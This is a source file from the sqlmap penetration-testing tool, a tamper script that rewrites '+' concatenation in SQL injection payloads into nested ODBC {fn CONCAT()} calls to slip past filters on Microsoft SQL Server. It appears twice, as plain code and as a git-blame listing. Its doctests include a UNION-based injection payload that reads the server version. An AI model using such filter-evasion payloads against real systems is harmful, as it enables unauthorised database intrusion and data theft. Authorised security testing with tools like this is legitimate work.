sqlmap/tamper/plus2fnconcat.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.common import zeroDepthSearch
from lib.core.compat import xrange
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))

def tamper(payload, **kwargs):
    """
    Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart

    Tested against:
        * Microsoft SQL Server 2008

    Requirements:
        * Microsoft SQL Server 2008+

    Notes:
        * Useful in case ('+') character is filtered
        * https://msdn.microsoft.com/en-us/library/bb630290.aspx

    >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
    'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'

    >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
    '1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'
    """

    retVal = payload

    if payload:
        match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal)
        if match:
            old = match.group(0)
            parts = []
            last = 0

            for index in zeroDepthSearch(old, '+'):
                parts.append(old[last:index].strip('+'))
                last = index

            parts.append(old[last:].strip('+'))
            replacement = parts[0]

            for i in xrange(1, len(parts)):
                replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i])

            retVal = retVal.replace(old, replacement)

    return retVal
Last preparations for DREI 2019-05-08 13:47:52 +03:00			`#!/usr/bin/env python`
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00
			`"""`
Bumping copyright year 2024-01-04 01:11:52 +03:00			`Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)`
Replacing doc/COPYING to LICENSE 2017-10-11 15:50:46 +03:00			`See the file 'LICENSE' for copying permission`
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00			`"""`

Fixes #2923 2018-02-10 13:06:31 +03:00			`import os`
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00			`import re`

Minor refactoring 2018-02-08 18:49:16 +03:00			`from lib.core.common import singleTimeWarnMessage`
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00			`from lib.core.common import zeroDepthSearch`
Some more DREI stuff 2019-03-28 18:04:38 +03:00			`from lib.core.compat import xrange`
Minor refactoring 2018-02-08 18:49:16 +03:00			`from lib.core.enums import DBMS`
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00			`from lib.core.enums import PRIORITY`

			`__priority__ = PRIORITY.HIGHEST`

			`def dependencies():`
Minor refactoring 2018-02-08 18:49:16 +03:00			`singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))`
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00
			`def tamper(payload, **kwargs):`
			`"""`
Implementation for an Issue #3108 2018-07-31 03:18:33 +03:00			`Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart`
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00
			`Tested against:`
			`* Microsoft SQL Server 2008`

			`Requirements:`
			`* Microsoft SQL Server 2008+`

			`Notes:`
			`* Useful in case ('+') character is filtered`
			`* https://msdn.microsoft.com/en-us/library/bb630290.aspx`

			`>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')`
			`'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'`

Fixes #3797 2019-07-11 13:40:56 +03:00			`>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')`
			`'1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'`
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00			`"""`

			`retVal = payload`

			`if payload:`
Fixes #3797 2019-07-11 13:40:56 +03:00			`match = re.search(r"('[^']+'\|CHAR\(\d+\))\+.*(?<=\+)('[^']+'\|CHAR\(\d+\))", retVal)`
			`if match:`
			`old = match.group(0)`
			`parts = []`
			`last = 0`

			`for index in zeroDepthSearch(old, '+'):`
			`parts.append(old[last:index].strip('+'))`
			`last = index`

			`parts.append(old[last:].strip('+'))`
			`replacement = parts[0]`

			`for i in xrange(1, len(parts)):`
			`replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i])`

			`retVal = retVal.replace(old, replacement)`
Fixes #3391) 2018-11-30 13:29:17 +03:00
Adding plus2fnconcat tamper script (Issue #2396) 2017-02-17 12:26:25 +03:00			`return retVal`